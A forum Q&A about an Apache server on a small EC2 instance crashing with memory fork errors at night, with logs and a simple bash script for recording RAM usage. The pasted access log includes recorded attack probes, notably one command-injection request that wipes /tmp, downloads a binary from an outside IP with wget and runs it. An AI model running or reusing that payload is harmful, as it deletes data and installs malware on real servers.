# Cannot allocate memory error and web crash

Tags: php, apache, amazon-ec2

We have a web in EC2 Instance (AWS).
We are suffering fall-downs in our web. The server does not fall down. The services http, ssh... crash.
A first sight, it looks like Apache and the systems is run out of memory: "

`[mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process"` (**web_error_log**)

When the web has fallen down, we see in Amazon Cloud watch that the CPU Utilization Average chart shows a form like a table , I attach a screenshot.(**Amazon CPU Usage**)

Always, the fallen down are at night, when nobody is using the web, around 3am.
We have 1G RAM and memory_limit = 128M
Nagios tell us this (I dont know if is important):

```
SWAP CRITICAL - 0% free (0 MB out of 0 MB) - Swap is either disabled, not present, or of zero size.
```

**Amazon CPU Usage**
[image]

In this periodod of time (23:55 - 03:20)

**ssl_access_log**

```
178.208.166.133 - - [19/Oct/2020:23:39:59 +0200] "GET /phpmyadmin/ HTTP/1.1" 404 209
178.208.166.133 - - [19/Oct/2020:23:39:59 +0200] "GET /phpMyAdmin/ HTTP/1.1" 404 209
178.208.166.133 - - [19/Oct/2020:23:39:59 +0200] "GET / HTTP/1.1" 200 3369
102.165.30.49 - - [20/Oct/2020:00:10:50 +0200] "GET / HTTP/1.1" 200 3369
193.118.53.202 - - [20/Oct/2020:01:19:12 +0200] "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 404 228
183.136.225.45 - - [20/Oct/2020:04:02:21 +0200] "GET / HTTP/1.0" 400 362
2.136.160.156 - - [20/Oct/2020:09:39:50 +0200] "GET / HTTP/1.1" 200 3369
```

**ssl_request_log**:

```
[19/Oct/2020:23:39:59 +0200] 178.208.166.133 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "GET /phpMyAdmin/ HTTP/1.1" 209
[19/Oct/2020:23:39:59 +0200] 178.208.166.133 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "GET / HTTP/1.1" 3369
[20/Oct/2020:00:10:50 +0200] 102.165.30.49 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "GET / HTTP/1.1" 3369
[20/Oct/2020:01:19:12 +0200] 193.118.53.202 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 228
[20/Oct/2020:04:02:21 +0200] 183.136.225.45 - - "GET / HTTP/1.0" 362
[20/Oct/2020:09:39:50 +0200] 2.136.160.156 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "GET / HTTP/1.1" 3369
```

**web_error_log**:

```
[Tue Oct 20 03:12:00.122498 2020] [mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process
[Tue Oct 20 04:03:07.837056 2020] [mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process
[Tue Oct 20 04:07:30.822234 2020] [mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process
[Tue Oct 20 04:08:21.534903 2020] [mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process
[Tue Oct 20 04:09:31.736715 2020] [mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process
[Tue Oct 20 04:10:39.043487 2020] [mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process
[Tue Oct 20 04:16:00.165502 2020] [mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process
[Tue Oct 20 04:23:48.986368 2020] [mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process
[Tue Oct 20 04:25:01.464174 2020] [mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process
[Tue Oct 20 04:26:38.149851 2020] [mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process
[Tue Oct 20 04:30:02.114841 2020] [mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process
[Tue Oct 20 04:38:04.779030 2020] [mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process
[Tue Oct 20 04:40:23.967185 2020] [mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process
[Tue Oct 20 04:40:51.077174 2020] [mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process
[Tue Oct 20 04:41:19.227287 2020] [mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process
[Tue Oct 20 04:41:58.513432 2020] [mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process
[Tue Oct 20 04:42:20.778768 2020] [mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process
[Tue Oct 20 04:43:15.363218 2020] [mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process
[Tue Oct 20 04:44:03.016940 2020] [mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process
[Tue Oct 20 04:45:25.196583 2020] [mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process
[Tue Oct 20 04:46:15.618371 2020] [mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process
[Tue Oct 20 04:47:23.739557 2020] [mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process
[Tue Oct 20 04:48:42.363260 2020] [mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process
[Tue Oct 20 04:50:22.488445 2020] [mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process
[Tue Oct 20 04:52:14.776093 2020] [mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process
[Tue Oct 20 04:54:33.111498 2020] [mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process
[Tue Oct 20 04:55:43.965691 2020] [mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process
[Tue Oct 20 04:57:41.343653 2020] [mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process
[Tue Oct 20 04:58:38.572778 2020] [mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process
[Tue Oct 20 05:00:03.216522 2020] [mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process
[Tue Oct 20 05:02:46.993336 2020] [mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process
[Tue Oct 20 05:04:13.273265 2020] [mpm_prefork:error] [pid 2899] (12)Cannot allocate memory: AH00159: fork: Unable to fork new process
[Tue Oct 20 09:38:58.388404 2020] [suexec:notice] [pid 2920] AH01232: suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
```

**access_log**:

```
127.0.0.1 - - [19/Oct/2020:23:23:53 +0200] "GET / HTTP/1.0" 200 3369
127.0.0.1 - - [19/Oct/2020:23:28:53 +0200] "GET / HTTP/1.0" 200 3369
209.17.96.130 - - [19/Oct/2020:23:31:48 +0200] "GET / HTTP/1.0" 200 3369
127.0.0.1 - - [19/Oct/2020:23:33:53 +0200] "GET / HTTP/1.0" 200 3369
127.0.0.1 - - [19/Oct/2020:23:38:53 +0200] "GET / HTTP/1.0" 200 3369
127.0.0.1 - - [19/Oct/2020:23:43:53 +0200] "GET / HTTP/1.0" 200 3369
127.0.0.1 - - [19/Oct/2020:23:48:53 +0200] "GET / HTTP/1.0" 200 3369
127.0.0.1 - - [19/Oct/2020:23:53:53 +0200] "GET / HTTP/1.0" 200 3369
127.0.0.1 - - [19/Oct/2020:23:58:53 +0200] "GET / HTTP/1.0" 200 3369
127.0.0.1 - - [20/Oct/2020:00:03:53 +0200] "GET / HTTP/1.0" 200 3369
127.0.0.1 - - [20/Oct/2020:00:08:53 +0200] "GET / HTTP/1.0" 200 3369
127.0.0.1 - - [20/Oct/2020:00:13:53 +0200] "GET / HTTP/1.0" 200 3369
127.0.0.1 - - [20/Oct/2020:00:18:53 +0200] "GET / HTTP/1.0" 200 3369
127.0.0.1 - - [20/Oct/2020:00:23:53 +0200] "GET / HTTP/1.0" 200 3369
127.0.0.1 - - [20/Oct/2020:00:28:53 +0200] "GET / HTTP/1.0" 200 3369
91.244.114.171 - - [20/Oct/2020:00:32:28 +0200] "GET / HTTP/1.1" 200 3369
127.0.0.1 - - [20/Oct/2020:00:33:53 +0200] "GET / HTTP/1.0" 200 3369
127.0.0.1 - - [20/Oct/2020:00:38:53 +0200] "GET / HTTP/1.0" 200 3369
127.0.0.1 - - [20/Oct/2020:00:43:53 +0200] "GET / HTTP/1.0" 200 3369
127.0.0.1 - - [20/Oct/2020:00:48:53 +0200] "GET / HTTP/1.0" 200 3369
127.0.0.1 - - [20/Oct/2020:00:53:53 +0200] "GET / HTTP/1.0" 200 3369
127.0.0.1 - - [20/Oct/2020:00:58:53 +0200] "GET / HTTP/1.0" 200 3369
... 
... (continue)
...
193.27.228.27 - - [20/Oct/2020:01:41:15 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 248
127.0.0.1 - - [20/Oct/2020:01:43:53 +0200] "GET / HTTP/1.0" 200 3369
127.0.0.1 - - [20/Oct/2020:01:48:53 +0200] "GET / HTTP/1.0" 200 3369
127.0.0.1 - - [20/Oct/2020:01:53:53 +0200] "GET / HTTP/1.0" 200 3369
127.0.0.1 - - [20/Oct/2020:01:58:53 +0200] "GET / HTTP/1.0" 200 3369
185.39.11.105 - - [20/Oct/2020:01:59:26 +0200] "GET http://example.com/ HTTP/1.1" 200 3369
127.0.0.1 - - [20/Oct/2020:02:03:53 +0200] "GET / HTTP/1.0" 200 3369
59.36.160.84 - - [20/Oct/2020:04:02:20 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+192.210.239.115/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1" 408 221
202.166.196.46 - - [20/Oct/2020:04:02:20 +0200] "GET / HTTP/1.1" 408 221
193.27.228.27 - - [20/Oct/2020:04:02:20 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 408 221
213.202.223.223 - - [20/Oct/2020:04:41:48 +0200] "GET / HTTP/1.1" 408 221
127.0.0.1 - - [20/Oct/2020:09:40:50 +0200] "GET / HTTP/1.0" 200 3369
::1 - - [20/Oct/2020:09:44:24 +0200] "OPTIONS * HTTP/1.0" 200 -
::1 - - [20/Oct/2020:09:44:49 +0200] "OPTIONS * HTTP/1.0" 200 -
::1 - - [20/Oct/2020:09:44:56 +0200] "OPTIONS * HTTP/1.0" 200 -
127.0.0.1 - - [20/Oct/2020:09:45:50 +0200] "GET / HTTP/1.0" 200 3369
```

- How can I know what causes the increase in CPU performance and then the crash of the web?
- Is it an attack or a badly programmed php script that wastes the ram memory?
- How can I record ram usage at night and what processes do it?

Thanks

Comment: More important than random excerpts from your log files would be those around the errors - are there any requests right before Apache faints? Are there any other services on that server that might accumulate memory, like a backup tool?

Answer (score 1):

Here is the solution of your third question,

> Simple Bash script which will record RAM usage in each 5-second interval and save in a text file on the home directory.

**Memory_recorder.sh**

```
#!/bin/bash
while :
do
   date >> ~/memory_info.txt
   free -h >> ~/memory_info.txt
   echo "===========================================================" >> ~/memory_info.txt
   sleep 5

done
```

**Command to execute script**

```
bash /path_of_script_file/Memory_recorder.sh
```

For this open a Screen and execute this script and detached the screen (If you don't know about the usage of screen let me know I will update my answer according to that.)

**Make sure your screen in which query is executing must be in running stage**

The output of this script will be like this

```
Thu 22 Oct 2020 05:24:42 PM UTC
              total        used        free      shared  buff/cache   available
Mem:          7.8Gi       544Mi       6.2Gi       1.0Mi       1.0Gi       7.0Gi
Swap:         767Mi        53Mi       714Mi
===========================================================
Thu 22 Oct 2020 05:24:47 PM UTC
              total        used        free      shared  buff/cache   available
Mem:          7.8Gi       547Mi       6.2Gi       1.0Mi       1.0Gi       7.0Gi
Swap:         767Mi        53Mi       714Mi
===========================================================
Thu 22 Oct 2020 05:24:52 PM UTC
              total        used        free      shared  buff/cache   available
Mem:          7.8Gi       544Mi       6.2Gi       1.0Mi       1.0Gi       7.0Gi
Swap:         767Mi        53Mi       714Mi
===========================================================
Thu 22 Oct 2020 05:24:57 PM UTC
              total        used        free      shared  buff/cache   available
Mem:          7.8Gi       540Mi       6.2Gi       1.0Mi       1.0Gi       7.0Gi
Swap:         767Mi        53Mi       714Mi
===========================================================
```

If you want to execute this script in backbroud just add **&** at the end of command like this

```
bash /path_of_script_file/Memory_recorder.sh &
```

It will print the process id of that command.

and when you want to kill this process

**Step-1: Get the process id of the script**

```
 ps aux | grep Memory_recorder.sh
```

the output will be like this

```
ubuntu     2008  0.0  0.0   6776  3448 pts/2    S<   17:52   0:00 bash Memory_recorder.sh
ubuntu     2024  0.0  0.0   6208   816 pts/2    S<+  17:52   0:00 grep --color=auto Memory_recorder.sh
```

> Here 2008 is the process id of Memory_recorder.sh bash script

**Step-2: Kill process using the process id**

```
kill 2008
```

the output will be like this

```
[1]+  Terminated              bash Memory_recorder.sh
```

Little Advice: Allocate some SWAP memory too. (I'm not sure if it works but you should give it a try)

Comment: Here is a command for top CPU usage by process id `ps -eo pid,ppid,cmd,%mem,%cpu --sort=-%cpu | head` replace this with `free -h` if you want to get CPU performance.